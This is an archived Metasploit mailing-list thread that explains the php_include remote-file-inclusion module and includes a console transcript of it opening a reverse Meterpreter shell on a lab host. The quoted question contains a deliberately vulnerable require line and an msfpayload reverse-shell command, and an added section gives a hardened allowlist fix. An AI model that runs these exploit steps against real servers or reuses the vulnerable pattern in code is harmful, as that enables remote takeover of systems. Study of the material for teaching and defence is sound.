Metasploit mailing list archives

Re: php_include confusion


From: egypt () metasploit com
Date: Mon, 12 Jul 2010 18:01:33 -0600

PHP is no longer configured to be vulnerable to this class of exploits
by default.  If you want to play with it, you'll need to set
allow_url_include to true in your php.ini.

XXpathXX gets replaced with the URL of the payload.  There are several
ways you could have discovered this yourself.  The easiest way is to
modify the exploit to print out the request before sending it.
Alternatively, you could run a sniffer or just read the code, which
may be a good idea anyway since you appear to have some misconceptions
about what this exploit does.  You don't need to generate the payload
and you don't need to host it anywhere else; everything needed to run
arbitrary code is contained in the exploit.

The following is a transcript of the exploit working as expected:

msf exploit(php_include) > show options

Module options:

   Name      Current Setting               Required  Description
   ----      ---------------               --------  -----------
   PATH      /                             yes       The base
directory to prepend to the URL to try
   PHPRFIDB                                no        A local file
containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /vuln/test.php?path=XXpathXX  no        The URI to
request, with the include parameter changed to XXpathXX
   Proxies                                 no        Use a proxy chain
   RHOST     192.168.99.129                yes       The target address
   RPORT     80                            yes       The target port
   SRVHOST   192.168.99.1                  yes       The local host to
listen on.
   SRVPORT   8080                          yes       The local port to
listen on.
   URIPATH   /foo                          no        The URI to use
for this exploit (default is random)
   VHOST                                   no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.99.1     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://192.168.99.1:8080/foo
[*] PHP include server started.
[*] Sending stage (33846 bytes) to 192.168.99.129
[*] Meterpreter session 4 opened (192.168.99.1:4444 ->
192.168.99.129:1415) at Mon Jul 12 17:55:48 -0600 2010

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter >


Hope this helped,
egypt
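[Editor's added example, not code from egypt, Jeffs or the Metasploit project.] The transcript above shows what XXpathXX becomes: the module substitutes the URL it is serving (http://192.168.99.1:8080/foo, built from SRVHOST, SRVPORT and URIPATH) into PHPURI, and the target's `require` then fetches and executes that remote file, which only works while allow_url_include is on. The snippet below places the vulnerable pattern from the quoted index_test.php next to a hardened version that maps the request parameter onto a fixed allowlist of local files and logs if allow_url_include is still enabled. The page names and the pages/ directory are assumed placeholders.

```php
<?php
// Added example, not from the thread. Vulnerable pattern quoted in the
// thread (index_test.php):
//
//     <? require $_GET['include'] ?>
//
// With allow_url_include=On, $_GET['include'] may be a URL, so the server
// downloads and runs whatever that URL returns. The hardened variant below
// never passes client input to require; it only uses it as a lookup key.

// Allowlist of includable pages. Keys are the only values a client may
// send; the file paths are assumed placeholders for this example.
const INCLUDE_MAP = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

/**
 * Resolve a request parameter to a known local file, or null if the
 * parameter is not one of the allowlisted keys. No path, URL or stream
 * wrapper supplied by the client can reach require.
 */
function resolveInclude(string $param): ?string
{
    return INCLUDE_MAP[$param] ?? null;
}

/**
 * Defender's configuration check: report whether the interpreter still
 * allows require/include to load remote URLs. This should return false
 * on a production server (allow_url_include=Off in php.ini).
 */
function urlIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (urlIncludeEnabled()) {
    error_log('allow_url_include is On; set it to Off in php.ini');
}

$page = $_GET['include'] ?? 'home';
$file = resolveInclude($page);

if ($file === null || !is_file($file)) {
    http_response_code(404);
    exit('Unknown page');
}

require $file;
```

Requests such as ?include=http://192.168.99.1:8080/foo fall through to the 404 branch because the URL is not a key in INCLUDE_MAP, and even a stray allow_url_include=On no longer matters for this script; turning the directive off in php.ini still removes the exposure for every other include on the host.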



On Mon, Jul 12, 2010 at 5:07 PM, Jeffs <jeffs () speakeasy net> wrote:
In metasploit when using the /unix/webapp/php_include the attacker is asked
to include a value for PHPURI  such as
/slogin_lib.inc.php?slogin_path=XXpathXX

Regarding the XXpathXX value, am I correct to assume this passes through to
the metasploit engine to construct an obfuscated string that is then sent to
the vulnerable site, appended to the URL automatically?

All documentation and information on using this exploit suggests that if you
are not going to use the PHPRFIDB setting, to leave this as "XXpathXX".

However all my experimentation does not send a specific url to the
vulnerable site as is demonstrated in several videos on this subject.

I know my rhost and lhost are correct, along with all other settings.  The
apache server runs php and is accessible.  The metasploit service just hangs
at:

[*] PHP include server started.


index_test.php looks like this:

<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>


and include.php.txt was created properly with msfpayload as such.

./msfpayload php/reverse_php LHOST=192.168.1.101 R >
/var/www/include.php.txt

Both files are on the web server in the proper directories.

If someone could clarify the XXpathXX value for me that would be greatly
appreciated.

Thanks much

jeffs
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

